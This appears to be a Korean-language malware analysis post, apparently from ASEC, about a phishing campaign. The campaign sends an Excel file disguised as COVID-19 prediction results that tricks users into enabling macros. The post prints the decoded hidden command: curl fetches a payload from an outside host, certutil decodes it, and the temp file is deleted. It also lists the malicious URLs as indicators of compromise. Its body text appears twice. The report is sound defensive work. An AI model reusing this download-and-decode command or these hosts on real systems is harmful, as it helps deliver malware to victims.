코로나 예측 결과 위장 악성 문서(xls) 유포 중
Contents
코로나 예측 결과 위장 악성 문서(xls) 유포 중
올해 코로나 관련된 주제의 악성코드가 끊임없이 발견되고 있는 가운데 이번에도 ASEC 분석팀에서는 ‘코로나 예측 결과’에 대한 내용으로 사용자를 속여 메일과 문서를 열람하도록한 공격을 확인하였다. 피싱 메일을 통해 유포되었으며 이 메일에는 악성 엑셀 문서가 첨부되어 있다.
[그림1] – 유포 중인 피싱 메일
첨부된 악성 엑셀 파일은 국가별 코로나 확진자 사망자의 수를 확인 할 수 있는 내용이 포함되어 있으며 특히 누적 확진 사망자의 인원을 확인하길 원하는 사용자는 엑셀 내부에 있는 계산 버튼(‘Predict’)를 선택하기 위해 매크로 활성화 버튼을 선택할 수 밖에 없다.
[그림2] – 매크로 허용 유도
하지만 해당 누적 계산을 수행하는 정상적인 매크로 코드 하위에는 악성파일을 다운로드하는 난독화 된 코드가 포함되어있다. 이 코드를 복호화 후에 CMD 명령을 확인 할 수 있다.
[그림3] – 난독화된 코드 복호화
- 악성 엑셀 내부 CMD 명령
cmd /c curl "http://refeeldominicana.nwideas.com/wp-content/uploads/chimps/category.php" -o "%temp%1.tmp"&certutil -decode "%temp%1.tmp" "%temp%lk.tmp"&cmd /c del "%temp%1.tmp"
[그림4] – 자사 RAPIT 시스템에서 확인되는 프로세스 트리 구조
현재는 다운로드되지 않아 추가 악성코드의 기능에 대해서는 확인이 불가하지만 위 명령에서 …
올해 코로나 관련된 주제의 악성코드가 끊임없이 발견되고 있는 가운데 이번에도 ASEC 분석팀에서는 ‘코로나 예측 결과’에 대한 내용으로 사용자를 속여 메일과 문서를 열람하도록한 공격을 확인하였다. 피싱 메일을 통해 유포되었으며 이 메일에는 악성 엑셀 문서가 첨부되어 있다.
[그림1] – 유포 중인 피싱 메일
첨부된 악성 엑셀 파일은 국가별 코로나 확진자 사망자의 수를 확인 할 수 있는 내용이 포함되어 있으며 특히 누적 확진 사망자의 인원을 확인하길 원하는 사용자는 엑셀 내부에 있는 계산 버튼(‘Predict’)를 선택하기 위해 매크로 활성화 버튼을 선택할 수 밖에 없다.
[그림2] – 매크로 허용 유도
하지만 해당 누적 계산을 수행하는 정상적인 매크로 코드 하위에는 악성파일을 다운로드하는 난독화 된 코드가 포함되어있다. 이 코드를 복호화 후에 CMD 명령을 확인 할 수 있다.
[그림3] – 난독화된 코드 복호화
- 악성 엑셀 내부 CMD 명령
cmd /c curl "http://refeeldominicana.nwideas.com/wp-content/uploads/chimps/category.php" -o "%temp%1.tmp"&certutil -decode "%temp%1.tmp" "%temp%lk.tmp"&cmd /c del "%temp%1.tmp"
[그림4] – 자사 RAPIT 시스템에서 확인되는 프로세스 트리 구조
현재는 다운로드되지 않아 추가 악성코드의 기능에 대해서는 확인이 불가하지만 위 명령에서 …
IoC
https://www.cooper9.com/wp-content/uploads/js_composer/temp/category.php
http://refeeldominicana.nwideas.com/wp-content/uploads/chimps/category.php
http://refeeldominicana.nwideas.com/wp-content/uploads/chimps/category.php